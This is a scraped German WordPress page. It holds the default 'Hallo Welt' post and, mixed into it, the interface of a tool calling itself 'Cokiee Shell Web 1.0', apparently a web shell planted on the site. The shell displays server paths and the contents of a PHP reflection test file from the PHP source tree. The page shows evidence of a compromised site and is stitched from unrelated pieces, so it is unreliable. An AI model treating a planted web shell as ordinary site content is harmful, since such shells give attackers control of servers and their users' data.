Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/reflection/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/reflection/tests/traits001.phpt |
--TEST-- ReflectionClass and Traits --FILE-- <?php trait Foo { public function someMethod() { } } class Bar { use Foo; public function someOtherMethod() { } } $rFoo = new ReflectionClass('Foo'); $rBar = new ReflectionClass('Bar'); var_dump($rFoo->isTrait()); var_dump($rBar->isTrait()); echo $rFoo; echo $rBar; --EXPECTF-- bool(true) bool(false) Trait [ <user> trait Foo ] { @@ %straits001.php 2-4 - Constants [0] { } - Static properties [0] { } - Static methods [0] { } - Properties [0] { } - Methods [1] { Method [ <user> public method someMethod ] { @@ %straits001.php 3 - 3 } } } Class [ <user> class Bar ] { @@ %straits001.php 6-10 - Constants [0] { } - Static properties [0] { } - Static methods [0] { } - Properties [0] { } - Methods [2] { Method [ <user> public method someOtherMethod ] { @@ %straits001.php 9 - 9 } Method [ <user> public method someMethod ] { @@ %straits001.php 3 - 3 } } }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare